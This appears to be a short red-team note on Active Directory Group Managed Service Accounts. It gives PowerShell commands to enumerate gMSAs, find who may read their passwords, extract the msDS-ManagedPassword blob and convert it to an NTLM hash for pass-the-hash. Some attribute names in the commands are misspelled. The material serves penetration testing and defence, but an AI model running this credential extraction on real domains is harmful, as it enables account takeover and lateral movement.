Group Managed Service Accounts (gMSA)

A Group Managed Service Account (gMSA) is a type of Active Directory account that can be used to run services on multiple servers. gMSAs are an improvement over traditional service accounts because they are easier to manage and provide automatic password management. gMSAs are managed by the domain controller and can be used to run services on multiple servers without having to manually update the password on each server.

Use of gMSA is recommended to protect from Kerberoast type attacks. A 256 bytes random password is generated and is rotated every 30 days. When an authorized user reads the attribute 'msds-ManagedPassword’ the gMSA password is computed. Only explicitly specified principals can read the password blob. Even the Domain Admins can't read it by default.

Enumeration

A gMSA has object class msDS-GroupManagedServiceAccount. This can be used to find the accounts.

PowerView

Get-DomainObject -LDAPFilter '(objectClass=msDSGroupManagedServiceAccount)'

ActiveDirectory Module

Get-ADServiceAccount -Filter *

The attribute 'msDS-GroupMSAMembership' (PrincipalsAllowedToRetrieveManagedPassword) lists the principals that can read the password blob.

ActiveDirectory Module

Get-ADServiceAccount -Identity <gSMA> -Properties * | select PrincipalsAllowedToRetrieveManagedPassword

The attribute msDS-ManagedPassword stores the password blob in binary form. Once you have compromised a principal that can read the blob. Use ADModule to read and DSInternals to compute NTLM hash:

# Retrieve the password
$Passwordblob = (Get-ADServiceAccount -Identity <gSMA> -Properties msDSManagedPassword).'msDS-ManagedPassword'

# Compute the NTLM hash
Import-Module C:\Tools\DSInternals.psd1
$decodedpwd = ConvertFrom-ADManagedPasswordBlob $Passwordblob
ConvertTo-NTHash -Password $decodedpwd.SecureCurrentPassword

Once you have the NTLM hash, it can be used to authenticate to other services. For example using Pass the Hash or Overpass the Hash techniques.